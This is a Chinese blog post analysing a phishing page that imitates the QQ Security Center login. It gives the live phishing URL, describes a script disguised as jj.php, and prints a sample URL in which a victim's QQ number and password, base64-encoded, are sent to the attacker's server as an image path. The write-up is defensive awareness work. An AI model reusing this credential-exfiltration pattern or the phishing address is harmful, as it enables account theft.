起因:昨天晚上朋友发了一个消息给我:

晚上喝了点酒,没怎么看就睡了。
第二天一大早上想起这个问题,心血来潮想扒一扒这个网站

首先看这个网址:
http://maschada.wbac.ac.th/ui.html?index/=ciquitj?url=s9fwpc&iv

打开是一个QQ安全中心的登陆界面:

常识:QQ安全中心的网址统一都是 https://aq.qq.com/
再加上这么奇怪的网站,第一反应就是盗号网址。

chrome查看源代码:一眼看去有几个地方比较可疑:

1. form的提交

2. 一段被url编码的js

3. 奇怪的js引用


首先搞懂这个url编码的js:


这里只是控制了输入框的默认值,问题不大。
再来看js引用部分:
一个很老套的套路:

<script src="jj.php"></script> 

这里的jj.php并不是php文件,用script引用,所以jj.php是一个js文件!
打开:

格式整理一下。。。

前半部分是简单的逻辑,主要判断输入的QQ号和密码是否符合标准。

关键代码

这里就是很明显的套路了:
你输入正确的QQ账户和密码后就会跳转到真正的QQ安全中心(这一步如果是输入错误也可能直接登录到QQ安全中心,因为一般QQ或者浏览器都会自动登录,不过这个没关系,不会有安全问题,也算是一个障眼法。)
这里注意到一个注释,和和上面的post请求差不多,但是用一个p();
所以来看看p()代码:

s的值用了ecode64()也就是用了base64编码:
QQ号 + \t + 密码 + \t
如果我输入了QQ和密码为 : 88488848\t shabisibaba\t
base64 编码:
ODg0ODg4NDhcdCBzaGFiaXNpYmFiYVx0==
http://maschada.wbac.ac.th//tpl/36402021580636317/ODg0ODg4NDhcdCBzaGFiaXNpYmFiYVx0==.gif_1474950810000

到此,分析结束。
其他信息:

总结:

小白一只,没有社工库,到这里就全部完了,只是简单分析了一下盗号的一般套路,希望各位保护好自己的账号。
网络安全常识和意识不只是搞网络安全的才需要具有的素质。
现在这种网络环境,这些隐私信息稍不注意就会被人挖走,好好提高自己的安全意识,尽量不做internet裸奔者。

本博客所有内容采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可

转载文章请注明:一次反盗号writeup - https://blog.i-ll.cc/archives/411

分类: 其他

Vectors

Vectors

不知所措,才是人生。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

我不是机器人*